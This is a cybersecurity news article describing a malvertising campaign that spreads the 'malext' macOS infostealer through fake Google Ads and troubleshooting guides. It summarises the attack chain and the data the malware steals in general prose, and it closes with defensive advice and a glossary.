Sunday 05 July 2026 23:37:48 GMT+02:00

Netcrook

HomeManifesto
News
Techcrook
Geocrook
WikicrookTeamAppContact
EnglishItalianoArabic

Cloud, SaaS & Identity Security

Mac Under Siege: Sophisticated Malvertising Blitz Delivers ‘malext’ Stealer to Unwitting Users

Published: 03 March 2026 14:38Category: Cloud, SaaS & Identity SecurityAuthor: LOGICFALCON

Subtitle: A sprawling fake ads campaign leverages Google search to infect macOS users with a potent infostealer, raiding browsers, wallets, and more.

It began like any other desperate online search: a macOS user, low on storage and patience, clicks a top Google result promising an easy fix. But instead of relief, they nearly triggered a digital heist. Behind that innocent-looking troubleshooting guide lurked “malext,” a cunning new variant of the AMOS infostealer, unleashed by one of the most aggressive malvertising campaigns targeting Apple users to date.

Fast Facts

  • Over 34 malicious Google Ads linked to fake Medium.com posts distributing malware to macOS users.
  • Attackers rapidly replaced banned ad accounts, with at least 53 compromised accounts identified.
  • The “malext” infostealer targets browsers, crypto wallets, Apple Notes, and more-exfiltrating up to 30MB of sensitive files per victim.
  • Malicious payloads are disguised as macOS troubleshooting commands and evade detection using obfuscation and anti-VM checks.
  • Persistence is achieved via LaunchDaemons and trojanized apps, enabling ongoing remote access for attackers.

Malvertising: The New Frontline for macOS Threats

For years, Windows users have borne the brunt of malvertising assaults, but this campaign signals a shift in the cybercrime playbook. Researchers @itspappy and Gi7w0rm exposed the operation after a user narrowly avoided infection. Their investigation revealed a sprawling web of fake ads-over 34 in the Google Ads Library-posing as helpful articles on trusted platforms like Medium, Evernote, and kimi.com. The lure: convincing guides promising solutions to common macOS woes, but hiding malicious shell commands within the text.

These commands, heavily obfuscated with Base64 and gzip, initiate a download chain that strips away Gatekeeper’s defenses and fetches Mach-O binaries designed for both Intel and Apple Silicon Macs. The malware even checks for virtual machines or analysis sandboxes using sneaky AppleScript tactics, making detection by researchers all the more difficult.

How “malext” Steals It All

Once inside, malext wastes no time. It harvests browser credentials, cookies, and history from 12+ Chromium browsers and Firefox, scrapes Apple Notes, Telegram data, and even OpenVPN profiles. It scours the Desktop and Documents folders for files-especially crypto wallets and sensitive documents-zipping up to 30MB for exfiltration. For those with password managers or crypto extensions, the threat is even greater: malext targets 266 browser extensions and 16+ major wallets, including Ledger and Exodus.

Persistence is achieved by installing LaunchDaemons and silently trojanizing legitimate wallet apps, ensuring the attacker’s foothold survives reboots. The stolen data is sent to a shifting array of command-and-control servers, with fallback IPs ready if domains are blocked.

Why This Matters

What sets this campaign apart is its scale and agility. Attackers swiftly replace banned ad accounts, making takedown efforts a game of whack-a-mole. Their lures are tailored, topical, and alarmingly convincing-preying on users’ trust in search results and urgency to fix system problems. The campaign’s reach and technical sophistication suggest a coordinated, possibly trafficker-run operation rather than a lone hacker.

The lesson: even on macOS, vigilance is crucial. Never copy-paste Terminal commands from untrusted sources, and always scrutinize sponsored search results. For those who’ve fallen victim, immediate credential rotation and a thorough malware scan are essential.

Conclusion

As cybercriminals refine their tactics, no platform is immune. The “malext” campaign is a stark reminder: the next big Mac threat might not come from a sketchy download, but from the very top of your Google search. Stay sharp, question everything-and remember, convenience can be costly in the world of cybercrime.

WIKICROOK

  • Malvertising: Malvertising is the use of online ads to spread malware, often by tricking users into clicking harmful links-even on trusted websites.
  • Infostealer: An infostealer is malware designed to steal sensitive data-like passwords, credit cards, or documents-from infected computers without the user's knowledge.
  • Mach: A Mach-O binary is a macOS executable file format, often used by both legitimate applications and, sometimes, by malware on Apple computers.
  • LaunchDaemon: A LaunchDaemon is a macOS background process that runs at startup, often used for system tasks or, by attackers, to maintain persistence.
  • Obfuscation: Obfuscation is the practice of disguising code or data to make it difficult for humans or security tools to understand, analyze, or detect.